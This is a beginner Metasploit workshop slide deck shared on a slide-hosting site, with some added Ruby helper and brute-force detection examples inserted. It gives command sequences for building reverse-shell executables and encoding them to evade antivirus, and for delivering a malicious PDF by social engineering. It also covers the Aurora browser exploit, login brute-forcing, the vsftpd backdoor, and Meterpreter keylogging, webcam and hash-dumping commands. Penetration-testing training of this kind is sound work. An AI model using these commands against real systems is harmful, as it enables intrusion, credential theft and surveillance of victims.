By: Ajay Srivastava
Please don’t expect ….
 How to evade antiviruses (antivirus evasion)
 How to do pivoting
 How to do port forwarding
 How to write your own Metasploit module
Disclaimer
All the information or technique you will be
learning here is for educational purpose and
should not be used for malicious activities.
Agenda
 Introduction
 Basics of Metasploit
 Information gathering
 Exploitation
 ( 11:30-11:45 - Break 1/ Tea )*
 Meterpreter Basics
 Post exploitation using meterpreter
 Meterpreter scripts
 ( 1:00 – 2:00 - Break 2 / Lunch )*
Agenda
 Metasploit utilities
 Client-side exploitation
 ( 4:00-4:20 – Break 3 / Tea )*
 Auxiliary module
 And we are done 
 * Lunch and Tea are self-sponsored.
Introduction
 It’s not a Tool, it’s a Framework!!!
History
 Developed by H.D. Moore in 2003
 Originally written in Perl and later rewritten in Ruby
 Acquired by Rapid7 in 2009
 Remains open source & free for use
Metasploit Architecture
Libraries
 Rex :
 The basic library for most tasks
 Handles sockets and protocols
 MSF CORE :
 Defines the Metasploit Framework
 Provides the ‘basic’ API
 MSF BASE :
 Provides the ‘friendly’ API
 Provides simplified APIs for use in the Framework
Modules
 Exploit
 Modules that actually attack a target system and obtain access.
 Payload
 Piece of code that executes on the remote system after successful exploitation.
 Auxiliary
 Exploit without a payload. Used for scanning, fuzzing and various other tasks.
Modules
 Encoders
 Programs which encode the payload to avoid antivirus detection
 Nops
 Used to keep payload sizes consistent
Payloads
 Single
 Completely standalone
 e.g. Add user
 Stagers
 Creates the network connection
 Stages
 Downloaded by the stagers
 e.g. Meterpreter
Payloads
 A payload is staged if its name contains a ‘/’ after the platform
 windows/shell_bind_tcp
 single payload with no stage
 windows/shell/bind_tcp
 a stager (bind_tcp)
 a stage (shell)
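The naming rule on this slide, worked through as an added example (written for this page, not code from the slides or from the Metasploit project): a small Ruby classifier that splits a payload name into platform, optional arch/sub-platform qualifiers, and the stage/stager parts. It goes a little beyond the slide's two cases by also handling names such as linux/x64/meterpreter/reverse_tcp and cmd/unix/interact; the QUALIFIER_SEGMENTS list is an assumption made for this example and is not complete.

```ruby
# Added example: classify a Metasploit payload name as single or staged
# using the rule from the slide. Not code from the Metasploit project.

# Segments that may sit between the platform and the payload parts
# (architecture or sub-platform). Assumed, incomplete list for this example.
QUALIFIER_SEGMENTS = %w[x86 x64 armle armbe aarch64 mipsle mipsbe ppc
                        unix python php perl ruby].freeze

# Returns a hash describing the payload name.
#   windows/shell_bind_tcp  -> single payload (one underscore-joined name)
#   windows/shell/bind_tcp  -> staged: stage "shell", stager "bind_tcp"
def classify_payload(name)
  parts = name.split("/")
  if parts.size < 2 || parts.any?(&:empty?)
    raise ArgumentError, "expected platform/<name> or platform/<stage>/<stager>: #{name.inspect}"
  end

  platform = parts.shift
  qualifiers = []
  # Consume arch / sub-platform segments, but never the last segment,
  # which is always part of the payload name itself.
  qualifiers << parts.shift while parts.size > 1 && QUALIFIER_SEGMENTS.include?(parts.first)

  case parts.size
  when 1
    { platform: platform, qualifiers: qualifiers, kind: :single,
      name: parts[0], stage: nil, stager: nil }
  when 2
    { platform: platform, qualifiers: qualifiers, kind: :staged,
      name: parts.join("/"), stage: parts[0], stager: parts[1] }
  else
    raise ArgumentError, "too many segments in payload name: #{name.inspect}"
  end
end

# Human-readable one-liner, e.g. for a quick sanity check before "set payload".
def describe_payload(name)
  info = classify_payload(name)
  if info[:kind] == :single
    "#{name}: single payload #{info[:name]}, no stage"
  else
    "#{name}: stager #{info[:stager]} sets up the connection, then fetches stage #{info[:stage]}"
  end
end

if $PROGRAM_NAME == __FILE__
  %w[windows/shell_bind_tcp windows/shell/bind_tcp
     linux/x64/meterpreter/reverse_tcp cmd/unix/interact].each do |n|
    puts describe_payload(n)
  end
end
```

The distinction matters when pairing an exploit with a listener: a staged payload needs a handler that knows both the stager and the stage, while a single payload carries everything in one piece.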
Interfaces
 MSFCONSOLE
 MSFCLI
 MSFWEB
 Armitage
MSFCONSOLE
 The most powerful of the interfaces
MSFCLI
MSFWEB
Armitage
 Graphical version of Metasploit
 Developed by Raphael Mudge
 Supports both GUI & CLI
Armitage
Basic Commands
 #msfconsole
 #msfupdate
 MSFConsole commands fall into two types:
 Core Commands
 Database commands
Core Commands
 help or ?
 banner
 version
 show
 search
 msf>search <module name>
 info
 msf>info <module name>
 use
 msf>use <exploit/auxiliary name>
Core Commands
 back
 show options
 set
 msf>set <option> <value>
 setg
 msf>setg <option> <value>
 unset
 msf>unset <option>
 unsetg
 msf>unsetg <option>
Core Commands
 show payloads
 set payload
 msf>set payload <payload name>
 check
 exploit
 run
Database Commands
 Default database : PostgreSQL
 database.yml
 /opt/metasploit/apps/pro/ui/config/database.yml
 # cat /opt/metasploit/apps/pro/ui/config/database.yml
 db_status
 db_disconnect
Database Commands
 db_connect
 msf> db_connect user:pass@localhost:port/dbname
 OR
 msf> db_connect -y <path of database.yml>
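The two db_connect forms on this slide take the same five values, either typed out as user:pass@host:port/dbname or read from database.yml with -y. As an added example (not code from the slides or from Metasploit), this Ruby snippet builds the first form from a constructed database.yml in the Rails layout Metasploit uses; the section name "production" and all the values are assumptions made for the example.

```ruby
# Added example: derive the db_connect connection string from a database.yml.
# Not code from the Metasploit project.
require "yaml"

# Constructed sample in the layout of Metasploit's (Rails-style) database.yml;
# every value here is made up for this example.
SAMPLE_DATABASE_YML = <<~YAML
  production:
    adapter: postgresql
    database: msf
    username: msf
    password: s3cret
    host: 127.0.0.1
    port: 5432
    pool: 75
    timeout: 5
YAML

# Build the "user:pass@host:port/dbname" string that db_connect expects
# from the named environment section of a database.yml document.
def db_connect_string(yaml_text, env = "production")
  config = YAML.safe_load(yaml_text)
  section = config && config[env]
  raise ArgumentError, "no '#{env}' section in database.yml" unless section.is_a?(Hash)

  required = %w[username password host port database]
  missing = required.reject { |key| section.key?(key) }
  raise ArgumentError, "database.yml is missing: #{missing.join(', ')}" unless missing.empty?

  user, pass, host, port, db = section.values_at(*required)
  format("%s:%s@%s:%d/%s", user, pass, host, port, db)
end

puts db_connect_string(SAMPLE_DATABASE_YML) if $PROGRAM_NAME == __FILE__
```

Because the typed form puts the database password on the msfconsole command line (and so into the console history), the -y form, which reads the same values from the file, is the one to prefer; the file itself then needs to be readable only by the user running the framework.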
Database Commands
 db_nmap
 msf> db_nmap -sV -A -O <ip range>
 hosts
 msf> hosts -h
 services
 msf> services
Database Commands
 vulns
 db_export
 db_import
 db_rebuild_cache
 creds
 db_load
 db_unload
Information Gathering
 Auxiliary modules are the best !!!
 Will cover in detail later
 Using auxiliary/scanner/portscan/tcp
 msf> use auxiliary/scanner/portscan/tcp
 Or
 nmap <switches> <ip address>
Exploitation
 To list available exploits :
 msf> search <exploit name>
 To select an exploit :
 msf> use <exploit name>
 To get information about the selected exploit
 msf/exploitname> info
 To check the options and set arguments
 msf/exploitname> show options
 To set the target host
 msf/exploitname> set rhost <victim ip>
Exploitation
 To list the payloads supported by the selected exploit
 msf/exploitname> show payloads
 To set the payload
 msf/exploitname> set payload <payload name>
 To set the attacker machine (where the payload connects back to)
 msf/exploitname> set lhost <own ip>
 To check whether the target is vulnerable to the selected exploit
 msf/exploitname> check
 To launch the attack
 msf/exploitname> exploit
Meterpreter
 Post-exploitation module
 Runs in the context of the exploited process
 Runs in memory and doesn’t create any file on disk
 Encrypted communication
 Stable and extensible
Meterpreter
 Classification
 Core commands
 File system commands
 System commands
 User interface commands
 Priv commands
 Networking commands
Meterpreter : Core commands
 background
 sessions
 ps
 migrate
 bgrun/bglist/bgkill
 resource
Meterpreter : Core commands
 run
 meterpreter> run <script name>
 channel
 meterpreter> execute -f <program> -c
 use
 meterpreter> use <extension name>
Meterpreter : File System Commands
 pwd
 cd
 getlwd/getlcd
 ls
 cat/edit
 download/upload
Meterpreter : File System Commands
 search
 meterpreter> search -d <directory> -f *.<fileformat> -r
 mkdir/rmdir
 rm/del
Meterpreter : System Commands
 sysinfo
 getpid/getuid
 shell
 reboot
 shutdown
 ps
Meterpreter : UI Commands
 User interface & Webcam commands
 idletime
 keyscan_start
 keyscan_dump
 keyscan_stop
 webcam_list
 webcam_snap
Meterpreter : Priv Commands
 getsystem
 hashdump
 timestomp
 timestomp -h
 timestomp <filepath> -v (display all timestamp attributes)
 timestomp <filepath> -c <MM/DD/YYYY H:M:S>
Meterpreter : Networking commands
 arp
 ipconfig/ifconfig
 netstat
 route
 portfwd
Meterpreter scripts
 Path :
 /usr/share/metasploit-framework/scripts/meterpreter
 Or
 meterpreter> run <Tab> (press Tab multiple times to list the scripts)
Meterpreter scripts run <script name>
 run checkvm
 run credcollect
 run keylogrecorder
 run winenum
 run getcountermeasure
 run getgui
Meterpreter scripts
 run scraper
 run hostedit
 run gettelnet
 run arpscanner
 run vnc
 run filecollector
 meterpreter> run filecollector -d <directory> -f *.txt -r
Metasploit Utilities
 Three main utilities to generate shellcode and to evade antiviruses
 msfpayload
 msfencode
 msfvenom
Msfpayload
 To generate a payload in different formats such as exe, C, Ruby and JavaScript
 Using msfpayload :
 root@kali:~# msfpayload -h
 To check options
 root@kali:~# msfpayload <payload name> O
 root@kali:~# msfpayload windows/meterpreter/reverse_tcp O
 Setting the options
 root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe
 Send this exploit.exe to the victim
Using Multi-handler Exploit / setting listener
 Setup listener:
 msf > search multi/handler
 msf > use exploit/multi/handler
 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
 msf exploit(handler) > show options
 msf exploit(handler) > set lhost <attacker ip>
 msf exploit(handler) > set lport 4422
 msf exploit(handler) > exploit
MSFEncode
 To bypass antiviruses
 Encodes the payload bytes and prepends a decoder stub; when the resulting EXE runs, the stub decodes the payload in memory and executes it.
 The payload can be encoded with different encoders
MSFEncode
 root@kali:~# msfencode -h
 Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>
 OPTIONS:
 -e <opt> The encoder to use
 -c <opt> The number of times to encode the data
 -t <opt> The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe
 -x <opt> Specify an alternate executable template
 -k Keep template working; run payload in new thread (use with -x)
MSFEncode
 list encoders:
 root@kali:~# msfencode -l
 msfencode with msfpayload:
 root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe
Client-side Attacks
 Server-side vulnerabilities are harder to find
 Most enterprises have incoming connections locked down with firewalls
 Client-side attacks are therefore the most common ones:
- Browser-based attacks
- Social engineering attacks using a malicious link or file
Client-side Attacks : Browser based
 Using the IE 6 based Aurora exploit
 msf > search aurora
 msf > use exploit/windows/browser/ms10_002_aurora
 msf exploit(ms10_002_aurora) > show options
 msf exploit(ms10_002_aurora) > set srvhost <attacker ip>
 msf exploit(ms10_002_aurora) > set srvport 80
 msf exploit(ms10_002_aurora) > set uripath /test
Client-side Attacks : Browser based
 msf exploit(ms10_002_aurora) > show options
 msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
 msf exploit(ms10_002_aurora) > show options
 msf exploit(ms10_002_aurora) > set lhost <own ip>
 msf exploit(ms10_002_aurora) > set lport 443
 msf exploit(ms10_002_aurora) > exploit
Client-side Attacks : File Format
 Nowadays file-format based exploits are widely used against targets in the wild.
 Files in formats such as PDF, DOC or RTF are sent to the victim as attachments, in the expectation that the victim opens them.
 For example:
 Adobe util.printf() buffer overflow vulnerability
 MS14-017 Microsoft Word RTF Object Confusion
Client-side Attacks : File Format
 Exploiting the Adobe util.printf() buffer overflow vulnerability
 msf > search adobe_utilprintf
 msf > use exploit/windows/fileformat/adobe_utilprintf
 msf exploit(adobe_utilprintf) > set filename resume.pdf
 msf exploit(adobe_utilprintf) > show options
 msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
Client-side Attacks : File Format
 msf exploit(adobe_utilprintf) > setg lhost <attacker ip>
 msf exploit(adobe_utilprintf) > set lport 443
 msf exploit(adobe_utilprintf) > exploit
 Setup listener (i.e. multi/handler)
 Send this resume.pdf using some social engineering techniques.
Client-side Attacks : File Format
 Setting up the listener on the local machine :
 msf > search multi/handler
 msf > use exploit/multi/handler
 msf exploit(handler) > show options
 msf exploit(handler) > set lhost <own ip>
 msf exploit(handler) > set lport 443
 msf exploit(handler) > exploit
Auxiliary Modules
 Pre-exploitation modules
 Port scanners, fuzzers, banner grabbers, brute-force modules etc.
 Path:
 /usr/share/metasploit-framework/modules/auxiliary
 or
 Using show auxiliary in msfconsole :
 msf > show auxiliary
 Used without payloads
Auxiliary Modules
 Used the same way as exploits, but without a payload
 msf> use <auxiliary name>
 ‘run’ command instead of ‘exploit’ command
 RHOSTS instead of RHOST
Auxiliary Modules : Port scanners
 The portscan auxiliary modules are used for port scanning
 Using portscanners :
 msf > search portscan
 msf > use auxiliary/scanner/portscan/tcp
 msf auxiliary(tcp) > show options
 msf auxiliary(tcp) > set rhosts <target>
 msf auxiliary(tcp) > set ports 1-100
 msf auxiliary(tcp) > set threads 10
 msf auxiliary(tcp) > run
Auxiliary Modules : SMB version fingerprinting
 msf > search smb_version
 msf > use auxiliary/scanner/smb/smb_version
 msf auxiliary(smb_version) > show options
 msf auxiliary(smb_version) > set rhosts 192.168.37.0/24
 msf auxiliary(smb_version) > set threads 10
 msf auxiliary(smb_version) > run
Auxiliary Modules : Version Scanner
 Banner grabbing of a MySQL server :
 msf > search MySQL
 msf > use auxiliary/scanner/mysql/mysql_version
 msf auxiliary(mysql_version) > show options
 msf auxiliary(mysql_version) > set rhosts <target>
 msf auxiliary(mysql_version) > run
Auxiliary Modules : Login Scanners
 Testing a login (brute-force) attack on MySQL :
 msf > use auxiliary/scanner/mysql/mysql_login
 msf auxiliary(mysql_login) > show options
 msf auxiliary(mysql_login) > setg rhosts <target>
 msf auxiliary(mysql_login) > set user_file userfile.txt
Auxiliary Modules : Login Scanners
 msf auxiliary(mysql_login) > set pass_file passfile.txt
 msf auxiliary(mysql_login) > set stop_on_success true
 msf auxiliary(mysql_login) > run
Auxiliary Modules : Telnet
 msf > search telnet_login
 msf > use auxiliary/scanner/telnet/telnet_login
 msf auxiliary(telnet_login) > show options
 msf auxiliary(telnet_login) > setg rhosts <target ip>
 msf auxiliary(telnet_login) > set user_file userfile.txt
Auxiliary Modules : Telnet
 msf auxiliary(telnet_login) > set pass_file passfile.txt
 msf auxiliary(telnet_login) > set stop_on_success true
 msf auxiliary(telnet_login) > run
 Verify:
 root@kali:~# telnet <target ip>
Auxiliary Modules : Attacking FTP
 msf > search ftp_version
 msf > use auxiliary/scanner/ftp/ftp_version
 msf auxiliary(ftp_version) > show options
 msf auxiliary(ftp_version) > set rhosts <target>
 msf auxiliary(ftp_version) > run
 Result on Metasploitable2: FTP Banner: '220 (vsFTPd 2.3.4)'
Auxiliary Modules : Attacking FTP
 Now checking for FTP login
 msf > search ftp_login
 msf > use auxiliary/scanner/ftp/ftp_login
 msf auxiliary(ftp_login) > set rhosts <target ip>
 msf auxiliary(ftp_login) > set user_file userfile.txt
 msf auxiliary(ftp_login) > set pass_file passfile.txt
 msf auxiliary(ftp_login) > set stop_on_success true
 msf auxiliary(ftp_login) > run
 Successful FTP login for 'msfadmin':'msfadmin'
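The mysql_login, telnet_login and ftp_login scanners above all do the same thing from the attacker's side: many login attempts against one host in a short time, stopping at the first success when stop_on_success is set. Seen from the server, that pattern is easy to flag. The following is an added example (written for this page, not part of the slides or of Metasploit) that reads constructed log lines in the layout of vsftpd's log and raises an alert when a client reaches a failure threshold inside a time window, and again when that client then logs in successfully, which is what the slide's "Successful FTP login for 'msfadmin':'msfadmin'" looks like from the server. The log lines, IPs and user names are all made up for the example.

```ruby
# Added example: detect login brute-forcing from the server's log.
# Not code from the slides or from Metasploit.
require "time"

# Constructed sample in the layout of vsftpd's log; not real data.
SAMPLE_LOG = <<~LOG
  Tue Mar  4 12:00:01 2014 [pid 2301] [root] FAIL LOGIN: Client "192.168.37.5"
  Tue Mar  4 12:00:02 2014 [pid 2303] [admin] FAIL LOGIN: Client "192.168.37.5"
  Tue Mar  4 12:00:02 2014 [pid 2305] [ftp] FAIL LOGIN: Client "192.168.37.5"
  Tue Mar  4 12:00:03 2014 [pid 2307] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
  Tue Mar  4 12:00:03 2014 [pid 2309] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
  Tue Mar  4 12:00:04 2014 [pid 2311] [msfadmin] FAIL LOGIN: Client "192.168.37.5"
  Tue Mar  4 12:00:05 2014 [pid 2313] [msfadmin] OK LOGIN: Client "192.168.37.5"
  Tue Mar  4 12:07:30 2014 [pid 2380] [alice] FAIL LOGIN: Client "192.168.37.9"
  Tue Mar  4 12:07:41 2014 [pid 2382] [alice] OK LOGIN: Client "192.168.37.9"
  Tue Mar  4 12:07:42 2014 [pid 2382] [alice] OK DOWNLOAD: Client "192.168.37.9", "/home/alice/notes.txt", 12 bytes, 1.00Kbyte/sec
LOG

# Only LOGIN events matter here; other records (downloads, connects) are skipped.
LOGIN_LINE = /\A(?<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?<user>[^\]]*)\] (?<result>FAIL|OK) LOGIN: Client "(?<ip>[^"]+)"/

def parse_login_line(line)
  m = LOGIN_LINE.match(line)
  return nil unless m
  { time: Time.parse(m[:ts]), user: m[:user], ok: m[:result] == "OK", ip: m[:ip] }
end

# Returns a list of alerts. :bruteforce fires once when a client reaches
# `threshold` failures inside `window` seconds; :success_after_failures fires
# when such a client then logs in successfully (the stop_on_success case).
def detect_login_bruteforce(lines, threshold: 5, window: 60)
  events = lines.map { |l| parse_login_line(l) }.compact
  alerts = []
  events.group_by { |e| e[:ip] }.each do |ip, evs|
    fails = []        # timestamps of recent failures, oldest first
    alerted = false
    evs.sort_by { |e| e[:time] }.each do |e|
      if e[:ok]
        if fails.size >= threshold
          alerts << { ip: ip, kind: :success_after_failures, user: e[:user], failures: fails.size }
        end
        fails.clear
        alerted = false
        next
      end
      fails << e[:time]
      fails.shift while e[:time] - fails.first > window   # drop failures outside the window
      if fails.size >= threshold && !alerted
        alerts << { ip: ip, kind: :bruteforce, failures: fails.size }
        alerted = true
      end
    end
  end
  alerts
end

if $PROGRAM_NAME == __FILE__
  detect_login_bruteforce(SAMPLE_LOG.lines).each { |a| puts a.inspect }
end
```

The threshold and window are parameters so the same sliding-window logic can be tuned per service; for MySQL or telnet logs only parse_login_line needs to change. A single mistyped password, like the alice lines above, stays below the threshold and produces no alert.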
Auxiliary Modules : Attacking FTP
 From the FTP version scan we know its version is vsFTPd 2.3.4
 Now looking for an exploit for this FTP version
 msf > search vsFTPd 2.3.4
 msf > use exploit/unix/ftp/vsftpd_234_backdoor
 msf exploit(vsftpd_234_backdoor) > show options
 msf exploit(vsftpd_234_backdoor) > set rhost <target ip>
 msf exploit(vsftpd_234_backdoor) > show payloads
 msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
 msf exploit(vsftpd_234_backdoor) > exploit
References
 Metasploit Guide, http://packetstormsecurity.com/files/119280
 SecurityTube Metasploit Framework Expert (SMFE) course by Vivek Ramachandran
 Metasploit Unleashed, http://www.offensive-security.com/metasploit-unleashed/Main_Page
Metasploit Humla for Beginner

More Related Content

What's hot (20)

NMap
NMapNMap
NMap
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Packet sniffing & ARP Poisoning
 Packet sniffing & ARP Poisoning  Packet sniffing & ARP Poisoning
Packet sniffing & ARP Poisoning
 
Burpsuite 101
Burpsuite 101Burpsuite 101
Burpsuite 101
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
 
Nmap tutorial
Nmap tutorialNmap tutorial
Nmap tutorial
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Nessus Kullanım Kitapçığı
Nessus Kullanım KitapçığıNessus Kullanım Kitapçığı
Nessus Kullanım Kitapçığı
 
Metasploitable
MetasploitableMetasploitable
Metasploitable
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of Service
 
from Source to Binary: How GNU Toolchain Works
from Source to Binary: How GNU Toolchain Worksfrom Source to Binary: How GNU Toolchain Works
from Source to Binary: How GNU Toolchain Works
 
Linux Device Tree
Linux Device TreeLinux Device Tree
Linux Device Tree
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
PACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless AttacksPACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless Attacks
 
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi ToplamaBeyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Iptables presentation
Iptables presentationIptables presentation
Iptables presentation
 

Similar to Metasploit Humla for Beginner

Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal PanchmahalkarPrajwal Panchmahalkar
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The  Ultimate Attack  Platform for Metasploit Armitage – The  Ultimate Attack  Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
 
Chapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsChapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsMeenalJabde
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
 
Proactive monitoring with Monit
Proactive monitoring with MonitProactive monitoring with Monit
Proactive monitoring with MonitOSOCO
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 

Similar to Metasploit Humla for Beginner (20)

Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Dev ops
Dev opsDev ops
Dev ops
 
Metapwn
MetapwnMetapwn
Metapwn
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The  Ultimate Attack  Platform for Metasploit Armitage – The  Ultimate Attack  Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Chapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsChapter 3 Using Unix Commands
Chapter 3 Using Unix Commands
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
 
Proactive monitoring with Monit
Proactive monitoring with MonitProactive monitoring with Monit
Proactive monitoring with Monit
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 

More from n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 
News bytes null 200314121904
News bytes null 200314121904News bytes null 200314121904
News bytes null 200314121904
 

Recently uploaded

Dyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptxDyslexia AI Workshop for Slideshare.pptx
